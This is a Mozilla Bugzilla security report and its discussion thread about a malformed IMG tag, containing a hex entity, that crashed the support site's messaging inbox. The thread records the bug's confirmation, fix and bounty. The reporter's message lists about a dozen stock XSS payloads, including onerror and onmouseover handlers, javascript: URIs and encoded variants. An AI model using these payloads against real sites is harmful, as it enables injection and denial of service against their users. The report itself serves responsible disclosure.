Closed Bug 1762414 Opened 3 years ago Closed 3 years ago

Malformed injected <IMG> tag crashes Messages Inbox Web support.mozilla.org

Categories

(support.mozilla.org :: General, defect)

Product:
support.mozilla.org
Component:
General
Type:
defect

Tracking

(Not tracked)

Status:
RESOLVED FIXED

People

(Reporter: alisyarief.404, Assigned: lmcardle)

References

(
URL
)

Details

(Keywords: reporter-external, sec-high, wsec-dos, Whiteboard: [reporter-external] [web-bounty-form] [verif?])

Attachments

(1 file)

File Payload XSS
914 bytes, text/plain
Details

Paylod XSS (minor) to Crash Messages Inbox

  1. Login website https://support.mozilla.org/
  2. Go to https://support.mozilla.org/id/messages/new
  3. Send to account Victim with payload below
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert(&quot;XSS&quot;)>
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
\<a onmouseover="alert(document.cookie)"\>xxs link\</a\>
\<a onmouseover=alert(document.cookie)\>xxs link\</a\>
<IMG SRC=# onmouseover="alert('xxs')">
<IMG onmouseover="alert('xxs')">
<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>
<img src=x onerror="&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041">
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
<IMG SRC="jav&#x0A;ascript:alert('XSS');">
  1. After send Messages menu messages user victim crash and notification alert :

An Error Occurred
Oh, no! It looks like an unexpected error occurred. We've already notified the site administrators. Please try again now, or in a few minutes.

  1. This not Denial-of-service attack or Rate Limit, because this payload impact only user support.mozilla.org

Impact :

this menu new messages on suport mozilla can to send to all user account support, attacker can send payload crash messages to all user account support mozill. and all user cannot open messages menu on https://support.mozilla.org/id/messages/

Supporting Material/References:

Because the proof of concept video file is too big, I uploaded it on youtube and the setting not public :

https://youtu.be/IHAByCLG5Xg

Thanks

Flags: sec-bounty?
Attached file File Payload XSS —

Hello Kang,

Thank you for your report.

Do you mean that when you send a message to a user with this payload, support.mozilla.org is no longer responsive? was the XSS payload executed?

For reference, we do not prefer testing on support production instance, as mentioned in our scope: https://www.mozilla.org/en-US/security/bug-bounty/web-eligible-sites/. Please use the staging instance for testing: https://support.allizom.org/en-US/

Thanks,
Frida

yes payload xss not executed, but after send payload to victim.
menu message user victim crash and cannot open error
detail POC on link youtube

I think on this web scope https://www.mozilla.org/en-US/security/bug-bounty/web-eligible-sites/
domain Support : support.mozilla.org is Eligible Websites & Services
so im test subdomain support.mozilla.org

After request tesing subdomain https://support.allizom.org/en-US/ i think this vulnerability same like support.mozilla.org
because after attacker send payload on message to victim, Victim cannot access menu message and notification error
this dangerous if attacker send to all user account on support mozilla, user cannot open menu message
because on default menu message can send message to all user account

This link Video POC subdomain https://support.allizom.org/en-US/ :

https://youtu.be/G1u5TVBTih8 ( not public )

Thanks

If it is required for testing
Can you send me a username account on the support.mozilla.org website for me to testing ?

Thanks

support.mozilla.org is the eligible site but we have a note under the listing to request testing in the staging instance instead of production so we don't create invalid content or disrupt users.

You can self-register on the staging instance, why do you need us to send you a username?

sorry if it's not polite to ask the user
I just think if this finding necessitates POC
I can test

Are these findings valid for eligible bounties?

I was able to validate your other reports and will try to reproduce this one too.

Unfortunately, denial of service reports are not eligible for bounty as we mention in the exclusions section in the program policy: https://www.mozilla.org/en-US/security/web-bug-bounty/. We might consider awarding hall of fame mention depending on the report.

Thanks,
Frida

Type: task → defect
Summary: Paylod XSS (minor) to Crash Messages Inbox Web support.mozilla.org → Malformed injected <IMG> tag crashes Messages Inbox Web support.mozilla.org

I can confirm that sending a message with the payload <IMG SRC="jav&#x0A;ascript:alert('XSS');"> crashes the inbox of the receiver as well as the sent messages page for the sender.

Status: UNCONFIRMED → NEW
Component: Other → General
Ever confirmed: true
Keywords: wsec-dos
Product: Websites → support.mozilla.org
See Also: → 1762422

Hello Leo, Hello Tasos,

Can you please check this report? There seems to be an issue with parsing malformed HTML when displaying messages which contain the mentioned payload. It is not necessarily a security issue but it is a serious issue which can be abused to deny access to users' inboxes.

Thanks,
Frida

Flags: needinfo?(tasos)
Flags: needinfo?(lmcardle)

Thanks for this report, it seems like our wiki parsing library can't handle hex numeric character references in tag attributes, so something as simple as <img alt="&#x41;"> will cause the error. (Whereas, interestingly, <img alt="&#65;"> won't cause the error, despite referencing the same code point, nor will simply using &#x41; outside of a tag attribute.)

That's something which will be most easily fixed upstream, but before I submit a PR there, I'll ensure we better handle parsing errors so they don't completely crash pages.

Assignee: nobody → lmcardle
Flags: needinfo?(tasos)
Flags: needinfo?(lmcardle)

sounds good. Thanks Leo.

Has it been fixed ?
And im retesting now ?

the pull requests are still not merged, you can retest when we mark the bug as RESOLVED FIXED to verify the fix.

Thanks,
Frida

Oh oke
Thanks Frida

The fix was deployed to staging, and the issue is fixed there. Leaving the bug open until the changes are deployed to production.

thanks for update

this report eligable for bounty ?

Thanks

After the issue is fixed and deployed to production, the bug bounty panel meets to discuss bounties, we will let you know our decision then.

Thanks,
Frida

The fix has been released to prod.

Status: NEW → RESOLVED
Closed: 3 years ago
Resolution: --- → FIXED

Normally "denial of service" bugs are not eligible, but this bug can be used for targeted harassment of users and it would not be obvious to the site operators that an attack was going on based on normal monitoring so it could continue for a bit longer than normal external DOS attacks so we have decided to treat this (and the symptoms in bug 1762422) as a kind of "XSS (minor)" since it does involve injecting stored content.

Flags: sec-bounty? → sec-bounty+

Thanks for fixed this bug
and thanks a lot for bounty

Thanks very much

Hello Kang,

Thank you again for your report. Please let us know how you would like to be mentioned in our hall of fame.

Thanks,
Frida

Group: websites-security

Hello Frida

Please input my profil

Name : Ali Syarief ( @kang_ali )

Thanks

Keywords: sec-high
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Creator:
Created:
Updated:
Size: